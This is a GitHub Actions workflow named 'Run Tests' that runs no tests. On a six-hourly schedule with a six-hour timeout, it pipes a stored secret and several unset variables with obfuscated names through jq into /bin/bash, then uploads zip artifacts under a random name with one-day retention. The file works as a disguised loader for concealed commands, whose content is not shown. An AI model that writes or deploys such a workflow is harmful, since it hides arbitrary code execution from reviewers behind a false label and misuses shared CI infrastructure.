name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '54 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          w200: ${{ secrets.w200 }}
        run: |
          printf '%s' "$w200" | jq -r .m8921 | /bin/bash
          printf '%s' "$fhfgl98162" | jq -r .uwm9523 | /bin/bash
          printf '%s' "$dxxyz55848" | jq -r .mg7 | /bin/bash
          echo $dslt39998 | jq -r .vjzhx55644 | /bin/bash
          printf '%s' "$vhaw4104" | jq -r .a659 | /bin/bash
          echo $m7088 | jq -r .bcrel3 | /bin/bash
          echo $hrb41 | jq -r .hemde4 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: DpymFTiv
          path: "*.zip"
          retention-days: 1
